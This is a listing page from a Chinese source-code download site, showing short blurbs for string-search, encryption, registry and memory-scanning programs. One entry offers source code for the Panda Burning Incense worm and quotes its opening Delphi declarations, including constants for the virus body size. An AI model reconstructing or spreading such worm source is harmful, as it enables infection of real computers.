搜索资源列表
EncryDeCry
- 我在字符串加密时的处理是每次取字符串的三个字节,再把三个字符连成一个24位的整型,前8位存放第一个字符,中间8位存放第二个字符,最后8位存放第三个字符。再取这个整型数的前6位对应的数值去差用户提供对应表,转化成相应的字符,再取第二个6位,第三个6位,第四个六位进行字符的转换。再重复前面相同的操作值到整个字符串转换完毕。在解密的过程就是根据用户提供的表进行查找和移位换原字符串。 这种算法比通常的直接根据用户提供的表进行转换有更高的安全性,且加密解密的效率很高。-string encryptio
searchchar2
- 在Visual C++ 中 模拟输入字符串 查找其他任何字符 并统计字符出现的频度-in Visual C analog input string find any other characters and the characters statistical frequency
CharFindGet
- 字符串的查找和提取,vc编程常见的问题,希望能对你有所帮助
Supergrid
- 这是一个实现注册表模糊搜索(不区分大小写)某一字符串(xms)的并删除的程序,有较完善的显示信息,已实现查询注册表中含xms的项和键值,在查找到的有些项删不掉的情况下,返回删除注册表键值项不成功的统计。在测试之前建议你先备份一下注册表。
带通配符的字符串匹配算法源代码
- 带通配符的字符串匹配算法源代码。程序中的查找算法比较先进,提高模糊查询的功能,可以查询字母和汉字,很有用吆。-with wildcard string matching algorithm source code. Procedures for the more advanced search algorithm to improve fuzzy query function can find letters and Chinese characters, useful shout.
ChFind.rar
- 中文查找工具,可以搜索出文件中含有中文字符串的位置并且定位到文件,ChineseCharSearchedTool
find
- 很强大的字符查找 帮助你理解C语言的字符串的有关函数-Find a very strong character to help you understand C language string of the function
Utilities
- 这是一个DLL,集成了平时用到的几种常见的函数,如拆分字符串,查找文件,文件夹是否存在等-This is a dll, have serval common functions in it, such as split string, find file or check the dir if its exist.
Stringtofindandextract
- 字符串的查找和提取 字符串的查找和提取 字符串的查找和提取-StringtofindandextractStringtofindandextractStringtofindandextractStringtofindandextractStringtofindandextract
morstest
- 效率很好的摩尔斯码生成程序,利用哈希树算法,不使用字符串查找-a good morse code generate function
locate
- linux 下查找字符串在文件中的位置,并将位置输出。-locate string in txt,and print where is
charcompare
- 字符串比较,可用于模糊查找。是进行每个字符的比较-char compare
str_tq
- Visual C++案例开发集锦\第三章\字符串的查找和提取的程序源码,希望对大家有所帮助-Visual C++ case development highlights \ chapter \ string find and extract the source code, we hope to help
search.tar
- 查找字符串B各个字符在字符串A中可能的位置 比如 A:kjdfasdkdkjfa; B:kfd 结果:[1 4 7],[1 4 9]-search.c search str2 possible position on str1
hash
- hash算法,比较2中算法的特点: 1、传统的根据逐个比较 2、根据hash定位,字符串查找-hash algorithm String lookup
memoryfindstring
- 在某进程的虚拟内存中查找是否含有某个字符或者字符串-find string in memory
rbt2
- 利用红黑树实现字符串的快速查找,在测试中发现要比哈希查找要快,在一百万个字符串查找每一个字符串,大概50us左右。-Using red and black tree to realize the rapid search string, in tests found than hash find fast, in one million a string search each string, about 50 around us.
virus
- 熊猫烧香原代码 熊猫烧香, 十六进制, Windows, 源代码, 字符串 熊猫烧香源代码 program Japussy uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry} const HeaderSize = 82432 //病毒体的大小 IconOffset = EB8 //PE文件主图标的偏移量 //在我的Delphi5 SP1
CPP-scan
- /* 函数说明:查找特征码 /* process: 要查找的进程 /* markCode: 特征码字符串,不能有空格 /* distinct:特征码首地址离目标地址的距离 负数在特征码在上 /* offset: 返回目标地址 /* size: 设置返回数据为几个BYTE 1 2 3 4 /* ordinal: 特征码出现的次数 /* beginAddr: 开始搜索地址 /* endAddr: 结束地址 /* ret:返回目标地址的内容-/* Function
jishiben
- windows自带记事本vb源代码 功能如下 1,文本框大小可以随窗体改变 2,读入文件的大小受限 3,窗体标题实时地显示当前文件名 4,可以通过菜单改变文本字体和背景色 5,剪切板的使用 6,可以查找字符串,使用到字符串的处理 7,可以对整个文档进行全选 8,可以在指定处插入时间日期 9,公共对话框的使用,保存,打开,打印等 -windows comes with Notepad vb source code Function as follo